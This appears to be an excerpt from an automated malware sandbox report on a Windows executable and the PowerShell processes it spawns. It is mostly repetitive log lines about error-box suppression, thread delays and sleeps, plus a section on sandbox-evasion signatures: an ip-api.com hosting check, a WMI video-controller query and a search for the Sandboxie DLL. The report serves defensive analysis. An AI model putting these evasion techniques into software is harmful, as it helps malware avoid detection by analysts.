                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Check if machine is in data center or colocation facility
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                    Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                    Source: 2QaN4hOyJs.exe, System.0.drBinary or memory string: SBIEDLL.DLLINFO
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeMemory allocated: 16A0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeMemory allocated: 1B190000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599886Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599766Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599656Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599541Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599406Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599296Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599176Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 599003Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598860Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598703Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598594Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598457Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598328Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598219Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 598109Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597985Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597860Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597735Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597610Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597485Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597360Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597235Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 597110Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596985Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596860Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596735Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596619Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596500Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596374Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596240Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 596106Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595984Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595873Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595766Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595641Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595531Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595422Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595313Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595203Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 595094Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594969Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594859Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594750Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594641Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594531Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594422Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594313Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594188Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594078Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 593969Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 593844Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 593735Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeWindow / User API: threadDelayed 2997Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeWindow / User API: threadDelayed 6800Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5963Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3876Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8084Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1515Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7849Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1686Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6010
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3727
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -599886s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -599766s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -599656s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -599541s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -599406s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -599296s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -599176s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -599003s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -598860s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -598703s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -598594s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -598457s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -598328s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -598219s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -598109s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -597985s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -597860s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -597735s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -597610s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -597485s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -597360s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -597235s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -597110s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -596985s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -596860s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -596735s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -596619s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -596500s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -596374s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -596240s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -596106s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -595984s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -595873s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -595766s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -595641s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -595531s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -595422s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -595313s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -595203s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -595094s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -594969s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -594859s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -594750s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -594641s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -594531s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -594422s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -594313s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -594188s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -594078s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -593969s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -593844s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632Thread sleep time: -593735s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep count: 8084 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep count: 1515 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220Thread sleep time: -7378697629483816s >= -30000sJump to behavior
